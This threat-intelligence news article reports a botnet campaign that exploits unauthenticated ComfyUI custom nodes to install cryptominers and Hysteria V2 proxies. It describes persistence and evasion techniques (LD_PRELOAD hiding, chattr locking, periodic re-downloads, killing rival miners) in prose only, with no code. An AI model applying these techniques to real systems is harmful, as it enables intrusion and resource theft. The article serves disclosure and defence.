Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign

A recent campaign has been identified targeting internet-exposed instances running ComfyUI, a popular stable diffusion platform, to incorporate them into a cryptocurrency mining and proxy botnet. This campaign employs a Python scanner to continuously search major cloud IP ranges for vulnerable targets, automatically installing malicious nodes via ComfyUI-Manager if no exploitable node is already present. The core of the attack involves scanning for exposed ComfyUI instances and exploiting a misconfiguration that allows remote code execution on unauthenticated deployments through custom nodes. Once successfully exploited, the compromised hosts are added to a cryptomining operation that mines Monero via XMRig and Conflux via lolMiner, and to a Hysteria V2 botnet. These are centrally managed through a Flask-based command-and-control (C2) dashboard. Despite the relatively small number of publicly accessible ComfyUI instances, over 1,000, the campaign is sufficient for threat actors to run opportunistic campaigns to gain financial benefits. Censys discovered the campaign after identifying an open directory on an IP address associated with Aeza Group, a bulletproof hosting services provider. This directory contained a previously undocumented set of tools used to execute the attacks. The tools include reconnaissance tools to enumerate exposed ComfyUI instances across cloud infrastructure, identify those with ComfyUI-Manager installed, and shortlist those susceptible to the code execution exploit. The attack leverages a Python script that functions as an exploitation framework, weaponizing ComfyUI's custom nodes to achieve code execution. This technique exploits the fact that some custom nodes accept raw Python code as input and execute it without requiring authentication. Attackers scan for specific custom node families that support arbitrary code execution, turning the service into a channel for delivering attacker-controlled Python payloads. A notable aspect of the attack is the use of a malicious package, "ComfyUI-Shell-Executor," created by the attacker to fetch a next-stage shell script. This script disables shell history, kills competing miners, launches the miner process, and uses the LD_PRELOAD hook to hide a watchdog process that ensures the miner process is revived if terminated. The malware also employs persistence mechanisms, such as downloading the shell script every six hours and re-executing the exploit workflow whenever ComfyUI is started. The campaign further incorporates measures to ensure persistence, such as copying the miner program to multiple locations and using the "chattr +i" command to lock the miner binaries, preventing them from being deleted or modified. Additionally, the attack targets a specific competitor, "Hisana," by overwriting its configuration to redirect mining output to its own wallet address and occupying Hisana’s C2 port with a dummy Python listener. The infected hosts are controlled via a Flask-based C2 panel, allowing the operator to push instructions or deploy additional payloads, including a shell script that installs Hysteria V2 for selling compromised nodes as proxies. Analysis of the attacker's shell command history revealed an SSH login attempt linked to a worm campaign targeting exposed Redis database servers. This activity is part of a broader campaign focused on discovering and exploiting exposed services, followed by deploying custom tooling for persistence, scanning, or monetization. The discovery of this campaign coincides with the emergence of multiple botnet campaigns exploiting various vulnerabilities to add devices to botnets or deliver malware for cryptocurrency mining and DDoS attacks. These campaigns highlight the increasing botnet activity, with significant surges noted in recent periods, driven by the availability of source code for botnets like Mirai. The ComfyUI campaign continues to evolve, with updates focusing on sandbox detection, process hiding, competition killing, and lateral movement, demonstrating the ongoing refinement of the threat actors' tactics.